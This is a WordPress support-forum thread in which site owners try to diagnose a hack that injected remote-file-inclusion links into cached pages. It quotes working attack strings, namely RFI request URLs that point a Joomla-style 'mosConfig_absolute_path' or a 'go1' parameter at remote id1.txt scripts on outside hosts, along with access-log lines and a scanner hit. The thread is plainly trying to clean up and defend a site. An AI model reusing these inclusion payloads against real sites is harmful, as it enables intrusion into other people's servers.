This is what I get on rollover on the very same link on your site.
//www.yoursite.com/?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS&mosConfig_absolute_path=http%3A%2F%2Fqqe.ru%2Fforum%2FSmileys%2Fid1.txt%3F%3F
//qqe.ru/forum/Smileys/id1.txt
Search this string in Google for info: echo("Shiro"."Hige") -or- this “id1.txt”
This may also be a relevant information.
Anything telling in your access logs?
What should I look for in access logs? I’m not very good this. I see he is using some “go1” to pass the URL in my access logs:
[23/Jan/2010:01:30:38 -0600] “GET /?go1=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1” 403 54923 “-” “Mozilla/5.0”
And there’s some php code there. I searched all my files for “go1” but nothing came up. I searched for go1 using exploit scanner; one hit was something like this:
Blocker Filesystem pattern scan Found string go1 [ABSPATH]/wp-content/cache/wp-cache-7ef8f7e1c52df0895d36dd2b3ef0ed41.html:267
Context
href=”http://www.mysite.com/index.php/page/2?go1=http%3A%2F%2Fpivot-e-solutions.com%2Fincludes%2Fdomit%2Fid1.txt” ><span class=’older’>Older Entries</span> </div>
It may be worth seeking advice or information from your host first. Perhaps they have dealt with the issue before and can offer some guidance.
I’m guessing you might be on a shared server, so they may have, or want information relative to your issue. Other than that, there are tons of links and “how to” on cleaning up a hacked site.
FAQ My site was hacked
I”m still having a problem with hidden users. After upgrading to 2.9.1 I’m not sure I’ve cleaned out the user in the DB.
I upgraded and the user showed up in the Users panel… deleted.
Deleted DB and made new one and re-uploaded the saved DB file.
Site is working again but not sure I got rid of the ID, although something in My PHP Admin told me to delete user_id2 which I did….
Not sure what I clicked on to bring that up but posts now do not have spam words in the Google alert. Can’t see the purpose of this hack — the link still goes to the blog, the words don’t show up anyplace…???
I’ve realized the hijacked links were the cached ones and that’s probably why they wouldn’t show up once I logged in.
I do not have any reason to believe wp-super-cache plugin was the problem but once got rid of that plugin completely my links look normal (maybe clayton can check again 🙂
I hate how I still do not know what files/database entries are/were causing this.
ahh http://redtideflorida.org/pages in case you were wondering . . .
crap sorry wrong discusion I was at a very similiar discussion at:
http://ww.wp.xz.cn/support/topic/357635?replies=9#post-1431225
